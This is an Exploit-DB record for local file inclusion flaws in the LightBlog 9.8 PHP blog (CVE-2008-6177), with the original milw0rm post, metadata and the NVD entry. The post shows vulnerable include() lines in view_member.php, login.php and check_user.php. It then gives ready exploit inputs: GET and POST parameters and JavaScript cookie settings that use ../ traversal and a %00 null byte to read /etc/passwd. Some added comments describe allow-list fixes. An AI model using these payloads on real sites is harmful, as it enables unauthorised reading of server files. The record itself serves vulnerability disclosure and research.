ID EDB-ID:6797
Type exploitdb
Reporter JosS
Modified 2008-10-21T00:00:00
Description
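LightBlog 9.8 (GET,POST,COOKIE) Multiple LFI (local file inclusion) Vulnerabilities. CVE-2008-6177. Webapps exploit for php platform. Per the CVE record, the flaws are exploitable only when magic_quotes_gpc is disabled, and they are classified as CWE-22 (path traversal).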
# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilities
# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
vuln file: view_member.php
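vuln code (the username is concatenated into the include() path without validation; file_exists() only confirms that the resulting path exists, it does not confine it to ./accounts/; $username_get is presumably assigned from $_GET['username'] in the elided lines):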
8: if(isset($_GET['username']) and file_exists("./accounts/".$_GET['username'].".php")){
x: ...
24: include("./accounts/{$username_get}.php");
39: }
PoC: GET view_member.php?username=[file]%00
ExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00
---
vuln file: login.php
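vuln code (in the line shown, the POSTed value goes straight into include() with no existence check or validation):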
18: include("./accounts/".$_POST['username_post'].".php");
PoC: POST login.php?username_post=[file]%00
ExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00
---
vuln file: check_user.php
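vuln code (cookie values are client-controlled, so they need the same validation as GET and POST input; here the only check before include() is file_exists()):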
6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){
$username_cookie = $_COOKIE['Lightblog_username'];
$password_cookie = $_COOKIE['Lightblog_password'];
if(file_exists("./accounts/{$username_cookie}.php")){
13:include("./accounts/{$username_cookie}.php");
PoC: javascript:document.cookie = "Lightblog_username=[file]%00; path=/"; document.cookie = "Lightblog_password=JosS;
path=/";
ExP: javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/";
document.cookie = "Lightblog_password=JosS; path=/";
---
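and more ...
[The author does not list the remaining instances. A fix therefore has to cover every include()/require() that builds a path from $_GET, $_POST or $_COOKIE, not only the three files shown: validate the username against a strict allow-list (for example letters, digits and underscore only) before it reaches the path. Newer PHP versions reject NUL bytes in file paths, which narrows the impact but leaves the unvalidated include in place.]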
hack0wn :D
# milw0rm.com [2008-10-21]
{"id": "EDB-ID:6797", "type": "exploitdb", "bulletinFamily": "exploit", "title": "LightBlog 9.8 - GET & POST & COOKIE Multiple LFI Vulnerabilities", "description": "LightBlog 9.8 (GET,POST,COOKIE) Multiple LFI Vulnerabilities. CVE-2008-6177. Webapps exploit for php platform", "published": "2008-10-21T00:00:00", "modified": "2008-10-21T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6797/", "reporter": "JosS", "references": [], "cvelist": ["CVE-2008-6177"], "lastseen": "2016-02-01T00:40:50", "viewCount": 5, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2016-02-01T00:40:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6177"]}], "modified": "2016-02-01T00:40:50", "rev": 2}, "vulnersScore": 6.2}, "sourceHref": "https://www.exploit-db.com/download/6797/", "sourceData": "# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies\n# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php\n#\n# Author: JosS\n# mail: sys-project[at]hotmail[dot]com\n# site: http://spanish-hackers.com\n# team: Spanish Hackers Team - [SHT]\n#\n# This was written for educational purpose. 
Use it at your own risk.\n# Author will be not responsible for any damage.\n\nvuln file: view_member.php\nvuln code:\n8: if(isset($_GET['username']) and file_exists(\"./accounts/\".$_GET['username'].\".php\")){\nx: ...\n24: include(\"./accounts/{$username_get}.php\");\n39: }\n\nPoC: GET view_member.php?username=[file]%00\nExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00\n\n---\n\nvuln file: login.php\nvuln code:\n18: include(\"./accounts/\".$_POST['username_post'].\".php\");\n\nPoC: POST login.php?username_post=[file]%00\nExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00\n\n---\n\nvuln file: check_user.php\nvuln code: \n6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){\n\n $username_cookie = $_COOKIE['Lightblog_username'];\n $password_cookie = $_COOKIE['Lightblog_password'];\n\n if(file_exists(\"./accounts/{$username_cookie}.php\")){\n13:include(\"./accounts/{$username_cookie}.php\");\n\nPoC: javascript:document.cookie = \"Lightblog_username=[file]%00; path=/\"; document.cookie = \"Lightblog_password=JosS;\n path=/\";\nExP: javascript:document.cookie = \"Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/\";\n document.cookie = \"Lightblog_password=JosS; path=/\";\n\n---\n\nand more ...\nhack0wn :D\n\n# milw0rm.com [2008-10-21]\n", "osvdbidlist": ["49213", "52123", "49214"]}
{"cve": [{"lastseen": "2020-10-03T11:51:05", "description": "Multiple directory traversal vulnerabilities in LightBlog 9.8, when magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) username parameter to view_member.php, (2) username_post parameter to login.php, and the (3) Lightblog_username cookie parameter to check_user.php.", "edition": 3, "cvss3": {}, "published": "2009-02-19T16:30:00", "title": "CVE-2008-6177", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6177"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:publicwarehouse:lightblog:9.8"], "id": "CVE-2008-6177", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6177", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:publicwarehouse:lightblog:9.8:*:*:*:*:*:*:*"]}]}